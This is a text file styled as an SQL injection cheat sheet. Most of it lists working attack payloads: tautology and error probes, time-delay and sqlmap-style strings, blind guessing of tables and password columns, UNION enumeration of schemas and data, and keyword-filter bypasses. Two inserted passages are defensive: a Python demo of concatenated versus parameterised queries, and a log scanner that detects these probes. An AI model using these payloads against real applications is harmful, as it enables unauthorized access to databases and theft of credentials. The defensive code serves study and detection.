Sql injection.txt
***********************************************
SQL injection cheat sheet *
***********************************************
- First, try to figure out the vulnerable parameter
NOTE: If it's a GET request, don't forget to URL-encode the characters.
param=' --> try to get error
param=" --> try to get error
param=' or 1=1 --> try if it works
param=' or 1=0 --> check if it returns nothing
param=' and 1=1 --> check if this works or produces error
' or sleep(2) and 1=1# --> try to get a delay; sleep() only executes when the other conditions are true and the engine actually needs to evaluate it.
' or sleep(2)# --> try get delay
admin' and sleep(2)# --> will delay only if the user admin exists
' union select sleep(2),null# --> check if it produces delay
' union select sleep(2),null,null,null,null# --> check if it produces delay, check for different number of columns
Try whether the queries above work when a comment is appended at the end:
param=' or 1=1# --> try if it works
param=' or 1=1 -- one space needed --> try if it works
param=' or 1=1 // --> try if it works
param= or 1=1# --> try if it works
param=and or 1=1# --> try if it works
param=' or 1=1-- sd --> try if it works
If the queries above don't work, try these sqlmap payloads:
'.)))("),.
'ghwshP<'">CZuifw
)+AND+4287=8913+AND+(7303=7303
)+AND+8680=8680+AND+(6351=6351
+AND+4573=5119
+AND+8680=8680
')+AND+9284=3986+AND+('ndfW'='ndfW
')+AND+8680=8680+AND+('juwu'='juwu
+AND+2138=DBMS_PIPE.RECEIVE_MESSAGE(CHR(83)||CHR(102)||CHR(111)||CHR(77),5)
')+AND+2138=DBMS_PIPE.RECEIVE_MESSAGE(CHR(83)||CHR(102)||CHR(111)||CHR(77),5)+AND+('VIDM'='VIDM
(SELECT+3273+FROM(SELECT+COUNT(*),CONCAT(0x716a6a7671,(SELECT+(ELT(3273=3273,1))),0x716b717071,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x)a)
(SELECT+CONCAT(0x716a6a7671,(SELECT+(ELT(6967=6967,1))),0x716b717071))
+AND+4920=(SELECT+UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(106)||CHR(118)||CHR(113)||(SELECT+(CASE+WHEN+(4920=4920)+THEN+1+ELSE+0+END)+FROM+DUAL)||CHR(113)||CHR(107)||CHR(113)||CHR(112)||CHR(113)||CHR(62)))+FROM+DUAL)
)+AND+7244=4397+AND+(3968=3968
)+AND+6379=6379+AND+(1483=1483
')+AND+2572=3816+AND+('alWa'='alWa
')+AND+6379=6379+AND+('mxeB'='mxeB
)+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+tsVj
+ORDER+BY+1--+UCdp
+UNION+ALL+SELECT+NULL--+UzBg
+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+ISdf
')+ORDER+BY+8048--+qQkS
')+UNION+ALL+SELECT+NULL--+TFas
')+UNION+ALL+SELECT+NULL,NULL--+EZcP
%'+ORDER+BY+1--+NSgg
%'+ORDER+BY+7605--+dZkK
%'+UNION+ALL+SELECT+NULL--+JQPp
%'+UNION+ALL+SELECT+NULL,NULL--+VtSC
+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+Lbrh
' UNION ALL SELECT NULL,NULL,CONCAT(0x716b6b6271,IFNULL(CAST(table_name AS CHAR),0x20),0x7162627671),NULL,NULL FROM INFORMATION_SCHEMA.TABLES-- sd --> shows table_name between a few marker characters
If nothing works, try these blind SQL payloads:
' AND (select 1)=1 <-- This should give a TRUE response -- subselect supported
Guessing Table name:
' AND (select 1 from admin limit 0,1)=1 <-- FALSE
' AND (select 1 from users limit 0,1)=1 <-- TRUE ======> Table found 'users'
Guessing Columns:
' AND (select substring(concat(1,pass),1,1) from users limit 0,1)=1 <-- FALSE
' AND (select substring(concat(1,password),1,1) from users limit 0,1)=1 <-- TRUE =====> Column 'password' found.
Now determine the number of columns in the current table
param=' or 1=1 order by 1#
param=' or 1=1 order by 10#
Let's say there are 3 columns
Now determine the vulnerable columns, i.e. the ones that are visible
param=' or 1=0 union select null,null,null# --> if it produces no error then try
param=' or 1=0 union select 1,2,3# --> check which number shows in web page
Otherwise try
param=' or 1=1 union select table_name,null,null from information_schema.tables#
If it produces an error, try table_name at the other positions
Now, let's say columns 1 and 2 are shown in the web page
To further enumerate:
param=' or 1=0 union select table_schema,null,null from information_schema.columns# --> display all database names
Note the 1=0 in the query above, so that only the database names are shown
param=' or 1=0 union select version(),null,null from information_schema.columns# --> retrieve version
param=' or 1=0 union select @@version,null,null from information_schema.columns# --> retrieve version in mssql
param=' or 1=0 union select substring(version(),1,1)=1,null,null from information_schema.columns# --> return true if version is 1.x.x
param=' or 1=0 union select substring(version(),1,1)=5,null,null from information_schema.columns# --> return true if version is 5.x.x
param=' or 1=0 union select substring(version(),3,1)=2,null,null from information_schema.columns# --> return true if version is 5.2.x
param=' or 1=0 union select table_name,null,null from information_schema.columns# --> display all table names
param=' or 1=0 union select table_name,null,null from information_schema.columns where table_schema='public'# --> display tables inside the public database
param=' or 1=0 union select column_name,null,null from information_schema.columns where table_schema='public' and table_name='info'# --> display all columns of the info table
param=' or 1=0 union select table_name,column_name,null from information_schema.columns# --> display table and column names together
Let's say the database name is public and the table name is info
Let the table info have two columns, id and name
param=' or 1=0 union select id,null,null from public.info# --> display id column from table "info"
param=' or 1=0 union select id,name,null from public.info# --> display id and name column from table "info"
param=' or 1=0 union select id,name,null from public.info where id='papa'# --> display id and name of 'papa'
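The reason the probes above work at all is that the parameter is pasted into the SQL text. The example below (added here; it is not part of the original cheat sheet) puts the concatenated query next to its parameterised fix, using a constructed in-memory SQLite table `users(id, password)`; SQLite has no `#` comment, so the tautology probe uses the `-- ` form from the sheet instead.

```python
import sqlite3

def make_db():
    # Constructed in-memory stand-in for the "users" table guessed in the blind section.
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)",
                    [("admin", "s3cret"), ("papa", "hunter2")])
    return con

def lookup_vulnerable(con, param):
    # String concatenation: the parameter becomes part of the SQL grammar,
    # so a quote closes the literal and whatever follows is parsed as SQL.
    sql = "SELECT id FROM users WHERE id = '" + param + "'"
    return [row[0] for row in con.execute(sql)]

def lookup_safe(con, param):
    # Parameterised query: the driver binds the value out of band, so quotes,
    # comment markers and keywords inside it are just characters in a string.
    return [row[0] for row in con.execute("SELECT id FROM users WHERE id = ?", (param,))]

def demo():
    con = make_db()
    tautology = "' or 1=1 -- "          # the "param=' or 1=1 -- " probe from the sheet
    return {
        "vuln_normal": lookup_vulnerable(con, "papa"),
        "vuln_tautology": sorted(lookup_vulnerable(con, tautology)),
        "safe_normal": lookup_safe(con, "papa"),
        "safe_tautology": lookup_safe(con, tautology),
    }

if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```

The concatenated query returns every row for the tautology input, while the bound parameter simply fails to match any id.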
BYPASSING filters
We can use case switching or inline comments to bypass simple filters on keywords such as union and select
param=' or 1=0 UniOn selEct id,null,null FroM public.info#
param=' or 1=0 un//ion sele//ct id,null,null fr/**/om public.info# works in mssql
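The case-switching and inline-comment tricks above defeat a filter that matches the raw request text. This added detection example (not from the original sheet) normalises the query string first, then matches the probe families the sheet lists, and runs over constructed access-log lines that replay those probes; the `naive_filter` function stands in for the kind of blocklist the bypasses are aimed at.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the probe families on this sheet: tautologies, time delays,
# UNION column probing, ORDER BY column counting, information_schema reads.
SIGNATURES = {
    "tautology": re.compile(r"\b(or|and) 1 ?= ?[01]\b"),
    "time_delay": re.compile(r"\b(sleep|benchmark|dbms_pipe\.receive_message) ?\("),
    "union_probe": re.compile(r"\bunion (all )?select\b"),
    "order_probe": re.compile(r"\border by \d+"),
    "schema_enum": re.compile(r"\binformation_schema\."),
}
REQUEST = re.compile(r'"(?:GET|POST) (\S+)')

def naive_filter(raw_query):
    # The kind of keyword blocklist the "BYPASSING filters" section defeats.
    return "union select" in raw_query

def normalise(raw_query):
    # Undo the bypasses on the sheet (URL encoding, /**/ and // inside keywords,
    # case switching) before matching, and collapse whitespace to single spaces.
    text = unquote_plus(raw_query)
    text = re.sub(r"/\*.*?\*/|//", "", text)
    return re.sub(r"\s+", " ", text.lower())

def classify(raw_query):
    text = normalise(raw_query)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(text))

def scan(log_lines):
    # Returns {line_number: tags} for every request whose query string matches.
    hits = {}
    for n, line in enumerate(log_lines, 1):
        m = REQUEST.search(line)
        if not m or "?" not in m.group(1):
            continue
        tags = classify(m.group(1).split("?", 1)[1])
        if tags:
            hits[n] = tags
    return hits

# Constructed access-log lines replaying probes from this sheet (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /item?id=42 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /item?id=%27+or+1%3D1%23 HTTP/1.1" 200 9123',
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /item?id=%27+or+sleep(2)%23 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /item?id=%27+or+1%3D0+UniOn+selEct+id,null,null+FroM+public.info%23 HTTP/1.1" 200 700',
    '10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /item?id=%27+or+1%3D0+un//ion+sele//ct+id,null,null+fr/**/om+public.info%23 HTTP/1.1" 200 700',
]

if __name__ == "__main__":
    for n, tags in scan(SAMPLE_LOG).items():
        print(n, tags)
```

Lines 4 and 5 pass `naive_filter` untouched but are tagged once the case and the inline comments are normalised away.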
Useful Resources
http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet
http://garage4hackers.com/showthread.php?t=1990
For Oracle DB
Oracle does not have an information_schema, so we need an alternative for it. The link below can be helpful.
https://stackoverflow.com/questions/8739203/oracle-query-to-fetch-column-names